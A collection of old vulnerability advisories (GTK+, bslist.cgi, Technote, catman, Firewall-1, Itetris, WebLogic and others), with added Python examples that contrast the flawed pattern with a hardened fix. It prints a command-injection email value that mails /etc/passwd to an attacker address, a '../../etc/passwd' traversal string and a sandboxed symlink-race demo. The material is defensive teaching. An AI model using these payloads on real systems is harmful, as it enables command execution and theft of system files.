A problem exists in the GIMP Toolkit (GTK+) that could allow a user to gain elevated privileges. The problem lies in the ability to load modules through the GTK_MODULES environment variable. Using this variable, it is possible to specify a path to modules that are not part of the GTK+ package, so a custom-crafted module can be loaded by the toolkit. Once loaded, the module's code is executed. This makes it possible for a user with malicious intent to potentially gain elevated privileges, overwrite system files, or execute arbitrary and potentially dangerous code.
An input validation vulnerability exists in Brian Stanback's bslist.cgi, a script designed to coordinate mailing lists. The script fails to properly filter ';' characters from the user-supplied email addresses it collects. As a result, maliciously formed values for this field can cause the script to run arbitrary shell commands with the privilege level of the web server. This can be exploited by signing up for the mailing list with the email address 'hacker@example.com;/usr/sbin/sendmail hacker@example.com < /etc/passwd'.
The script fails to properly filter ';' characters from the user-supplied email address it collects. As a result, maliciously formed values for this field can cause the script to run arbitrary shell commands with the privilege level of the web server. An attacker can enter 'hacker@example.com;/usr/sbin/sendmail hacker@example.com < /etc/passwd' as their email address, which will cause the server to mail a confirmation letter along with the passwd file to the attacker.
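The two bslist.cgi entries above both come down to one defect: an address taken from the form is pasted into a single shell string, and the shell then treats the ';' as a command separator. The following is an added Python example (not Brian Stanback's code, and the sample addresses are constructed) that tokenises the interpolated string the way /bin/sh would, so the second command becomes visible, and then shows the hardened pattern: an allow-list check on the address followed by an argv list that is executed without any shell.

```python
import re
import shlex

# Constructed sample values for this example (not taken from any real report).
SAFE_ADDRESS = "alice@example.org"
INJECTED_ADDRESS = "hacker@example.com;/usr/sbin/sendmail hacker@example.com < /etc/passwd"

# Deliberately narrower than RFC 5322: no whitespace and none of ; | & < > ` $ ( )
# can ever pass, and the local part may not start with '-' (no option smuggling).
EMAIL_RE = re.compile(
    r"^[A-Za-z0-9][A-Za-z0-9._%+-]{0,63}@[A-Za-z0-9.-]{1,253}\.[A-Za-z]{2,}$"
)

# Tokens that make a POSIX shell start a new command.
SEPARATORS = {";", "|", "||", "&", "&&"}


def vulnerable_command(address):
    """The bslist.cgi pattern: untrusted input interpolated into one shell string.
    Returned as a string only; this example never executes it."""
    return f"/usr/sbin/sendmail {address}"


def shell_view(command):
    """Split the string the way /bin/sh would, treating ; < > | & as their own
    tokens, so we can see what the shell would actually run."""
    lex = shlex.shlex(command, posix=True, punctuation_chars=True)
    lex.whitespace_split = True
    return list(lex)


def command_count(command):
    """How many separate commands the shell would execute for this string."""
    return 1 + sum(1 for tok in shell_view(command) if tok in SEPARATORS)


def is_valid_address(address):
    return EMAIL_RE.fullmatch(address) is not None


def sendmail_argv(address):
    """Hardened version: validate first, then build an argv list for
    subprocess.run(argv) with no shell, so no metacharacter is interpreted.
    The /usr/sbin/sendmail path is assumed for this example."""
    if not is_valid_address(address):
        raise ValueError(f"rejected address: {address!r}")
    return ["/usr/sbin/sendmail", address]


if __name__ == "__main__":
    print(shell_view(vulnerable_command(INJECTED_ADDRESS)))
    print(command_count(vulnerable_command(INJECTED_ADDRESS)), "commands")
    print(sendmail_argv(SAFE_ADDRESS))
```

Note that the fix is the combination: the allow-list keeps junk out of the mail system, and the shell-free argv means that even an address the regex wrongly accepts can only ever be one argument to sendmail, never a second command.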
A script that ships with Technote, print.cgi, accepts a parameter called 'board'. This remotely-supplied variable is used as a filename when the open() function is called. In addition to allowing the attacker to specify a file to be opened remotely, the variable is not checked for '../' character sequences. As a result, a malicious remote user can specify an arbitrary file on the file system as this variable (by using ../ sequences followed by its real path), which will be opened by the script. Its contents will then be disclosed to the attacker.
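The print.cgi defect is a request parameter used as a filename with no containment check. The following added Python example (not Technote's code; the data directory and the '.txt' suffix are assumptions for illustration) shows the unchecked join beside a resolver that applies two independent checks: an allow-list on the board name and a check that the fully resolved path still lies inside the data directory.

```python
import os
import re

# Constructed location for this example; Technote's real data path is not given.
DATA_DIR = "/srv/technote/data"

# Only short, plain board names: no slashes, no dots, so '../' cannot be formed.
BOARD_RE = re.compile(r"^[A-Za-z0-9_-]{1,32}$")


def vulnerable_board_path(board):
    """The print.cgi pattern: the request parameter becomes part of the
    filename handed to open() without any check."""
    return os.path.join(DATA_DIR, board)


def escapes_base(board, base_dir=DATA_DIR):
    """Containment check on its own: True if the joined path lands outside
    base_dir. commonpath() is used instead of a string-prefix test so that
    '/srv/technote/data2' is not mistaken for a child of '/srv/technote/data'."""
    base = os.path.normpath(os.path.abspath(base_dir))
    candidate = os.path.normpath(os.path.join(base, board))
    return os.path.commonpath([base, candidate]) != base


def resolve_board_file(base_dir, board):
    """Hardened resolver: allow-list the name, then confirm the resolved path
    (realpath also collapses symlinks) is still under the data directory."""
    if not BOARD_RE.fullmatch(board):
        raise ValueError(f"board name rejected: {board!r}")
    base = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(base, board + ".txt"))
    if os.path.commonpath([base, candidate]) != base:
        raise ValueError(f"path escapes data directory: {candidate}")
    return candidate


def board_is_allowed(board, base_dir=DATA_DIR):
    """Boolean wrapper around resolve_board_file for callers and tests."""
    try:
        resolve_board_file(base_dir, board)
        return True
    except ValueError:
        return False


if __name__ == "__main__":
    for name in ("news", "../../etc/passwd"):
        print(name, "->", vulnerable_board_path(name), "| allowed:", board_is_allowed(name))
```

Either check alone would stop the traversal described above; keeping both means a later relaxation of the name pattern (say, to permit dots) does not silently reopen the hole.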
catman is a utility for creating preformatted man pages, distributed as part of the Solaris Operating Environment. A problem exists which could allow local users to overwrite or corrupt files owned by other users. The problem occurs in the creation of temporary files by the catman program. Upon execution, catman creates files in the /tmp directory using the file name sman_<pid>, where pid is the Process ID of the running catman process. The creation of a symbolic link from /tmp/sman_<pid> to a file owned and writable by the user executing catman will result in the file being overwritten, or in the case of a system file, corrupted. This makes it possible for a user with malicious intent to overwrite or corrupt files owned by other users, and potentially overwrite or corrupt system files.
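The catman problem is the classic predictable temporary file: anyone who can guess sman_<pid> can plant a symlink there first. The following added Python example (not Solaris code; the PID and file names are constructed) plays the race out inside a private directory it creates itself, showing that a plain open() follows the planted link, that O_CREAT|O_EXCL|O_NOFOLLOW refuses the same path, and that mkstemp() avoids the predictable name altogether.

```python
import os
import tempfile

# Constructed stand-in values for this example.
FAKE_PID = 4242                     # stands in for the catman process's PID
PAGE_TEXT = "formatted man page\n"  # what catman would write to its temp file


def predictable_tmp_write(tmp_dir, pid, data):
    """The catman pattern: a name anyone can predict (sman_<pid>) opened with a
    plain open(), which follows whatever symlink already sits at that path."""
    path = os.path.join(tmp_dir, f"sman_{pid}")
    with open(path, "w") as fh:
        fh.write(data)
    return path


def exclusive_tmp_write(tmp_dir, pid, data):
    """Same predictable name, but O_CREAT|O_EXCL|O_NOFOLLOW: the kernel refuses
    if anything (regular file or symlink) already exists at that path.
    Returns True if the file was created, False if the open was refused."""
    path = os.path.join(tmp_dir, f"sman_{pid}")
    flags = os.O_WRONLY | os.O_CREAT | os.O_EXCL | os.O_NOFOLLOW
    try:
        fd = os.open(path, flags, 0o600)
    except OSError:          # EEXIST on Linux when a symlink is already there
        return False
    with os.fdopen(fd, "w") as fh:
        fh.write(data)
    return True


def random_tmp_write(tmp_dir, data):
    """mkstemp(): unpredictable name plus O_EXCL, the standard remedy."""
    fd, path = tempfile.mkstemp(prefix="sman_", dir=tmp_dir)
    with os.fdopen(fd, "w") as fh:
        fh.write(data)
    return path


def run_demo():
    """Plant a symlink named sman_<pid> pointing at a file that stands in for
    something the user running catman must not be able to clobber, then try
    each writer against it. Everything happens inside a fresh private directory."""
    sandbox = tempfile.mkdtemp(prefix="catman-demo-")
    victim = os.path.join(sandbox, "victim.conf")
    with open(victim, "w") as fh:
        fh.write("original contents\n")
    os.symlink(victim, os.path.join(sandbox, f"sman_{FAKE_PID}"))

    predictable_tmp_write(sandbox, FAKE_PID, PAGE_TEXT)
    with open(victim) as fh:
        victim_after = fh.read()

    refused = not exclusive_tmp_write(sandbox, FAKE_PID, PAGE_TEXT)
    safe_path = random_tmp_write(sandbox, PAGE_TEXT)

    return {
        "victim_clobbered_by_predictable_name": victim_after == PAGE_TEXT,
        "exclusive_open_refused": refused,
        "mkstemp_name_unpredictable": os.path.basename(safe_path) != f"sman_{FAKE_PID}",
    }


if __name__ == "__main__":
    for check, result in run_demo().items():
        print(f"{check}: {result}")
```

The O_EXCL variant is what a minimal patch to an existing program looks like; mkstemp() (or, for a privileged daemon, a dedicated directory not writable by other users) is the better design because it removes the guessable name as well as the follow-the-link behaviour.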
Check Point Software's VPN-1 and Firewall-1 products contain a vulnerability in their 'Fast Mode' option that may allow an attacker to bypass access control restrictions and reach certain blocked services. Fast Mode is a setting that turns off analysis of packets in TCP sessions once the TCP three-way handshake has completed, for speed-critical services. If this setting is enabled on a firewall, it may be possible for a remote attacker to reach blocked services on a host protected by the firewall via the Fast Mode rule. It is also reportedly possible to reach hosts at least one hop away on the same interface as the protected target host.
Infinite Interchange is a multi-function email server which supports most common Internet protocols; among its components are an HTTP server and a webmail interface. Interchange is subject to a denial of service: a malformed POST request of approximately 963 bytes sent to the HTTP server port will crash Interchange, and a restart of the service is required to regain normal functionality. This vulnerability may be the result of a buffer overflow; although this has not been verified, it could lead to the execution of arbitrary code on the target host.
Itetris is a clone of the popular Tetris puzzle game for Linux systems. The svgalib version of Itetris is installed setuid root so that it may access video hardware when run by a regular user. Itetris contains a vulnerability which may allow unprivileged users to execute arbitrary commands as root. Itetris uses the system() function to execute gunzip when uncompressing font files. Unfortunately it does so in a very insecure way, relying on gunzip being located in one of the directories listed in the PATH environment variable. It is possible to exploit this vulnerability if an attacker sets PATH to include a directory under his/her control in which a 'gunzip' is found instead of, or before, the real one.
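The Itetris entry is a different flavour of unsafe system() use from the bslist.cgi one: the argument is fine, but the program name is resolved through an environment the privileged process inherited from an untrusted user. The following added Python example (not the Itetris code; the font path, the trusted directories and the /usr/bin/gunzip location are assumptions) shows an audit helper that flags the PATH entries a setuid program must never rely on, the hardened invocation (absolute program path, argv list, scrubbed environment), and the option of not shelling out at all by decompressing in-process.

```python
import gzip
import os
import subprocess
import tempfile

# Directories a privileged program may trust for locating helpers. Constructed for
# this example; adjust to the platform's real system directories.
TRUSTED_DIRS = ("/usr/bin", "/bin")
TRUSTED_PATH = ":".join(TRUSTED_DIRS)


def vulnerable_command(font):
    """The Itetris pattern: system("gunzip ...") leaves the lookup of 'gunzip' to
    the caller's PATH. Returned as a string here, never executed."""
    return f"gunzip {font}"


def classify_path(path_value):
    """Flag PATH entries a setuid program must not rely on, with the reason."""
    findings = []
    for entry in path_value.split(":"):
        if entry == "":
            findings.append((entry, "empty entry means the current directory"))
        elif not os.path.isabs(entry):
            findings.append((entry, "relative entry, resolved against the cwd"))
        elif entry not in TRUSTED_DIRS:
            findings.append((entry, "outside the trusted system directories"))
    return findings


def hardened_gunzip_invocation(font):
    """Absolute program path, argv list (no shell) and a minimal environment, so
    neither PATH nor any other inherited variable decides what runs.
    Hand the result to subprocess.run(argv, env=env, check=True)."""
    if not os.path.isabs(font):
        raise ValueError("font path must be absolute")
    argv = ["/usr/bin/gunzip", font]   # assumed location of the real gunzip
    env = {"PATH": TRUSTED_PATH}
    return argv, env


def decompress_in_process(font):
    """Often the better fix: no child process at all, so there is no PATH,
    no shell and no setuid helper to worry about."""
    with gzip.open(font, "rb") as fh:
        return fh.read()


def make_sample_font():
    """Constructed test fixture: a small gzip file standing in for a font."""
    path = os.path.join(tempfile.mkdtemp(prefix="itetris-demo-"), "font.gz")
    with gzip.open(path, "wb") as fh:
        fh.write(b"GLYPHS")
    return path


if __name__ == "__main__":
    for entry, reason in classify_path("/home/eve/bin::./tools:/usr/bin:/bin"):
        print(f"untrusted PATH entry {entry!r}: {reason}")
    print(hardened_gunzip_invocation("/usr/share/itetris/font.gz"))
    print(decompress_in_process(make_sample_font()))
```

The environment scrub matters beyond PATH: a setuid program that spawns anything should start from a fixed, minimal environment rather than the caller's, which is the same lesson the GTK_MODULES entry at the top of this page teaches for library loading.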
BEA Systems WebLogic Server is vulnerable to an unchecked buffer vulnerability in a particular handler for URL requests that begin with two dots '..'. Depending on the data entered into the buffer, WebLogic Server could be forced to crash or arbitrary code could be executed on the system in the security context of the web server. In the event that random data was sent in order to crash the server, restarting the application would be required in order to regain normal functionality.
It is possible for a user to cause a CPU-utilization denial of service by sending malformed arguments to the mstask.exe service, which will cause CPU utilization to spike. By default, mstask.exe accepts connections from the local host only. A restart of the system is required in order to regain normal functionality.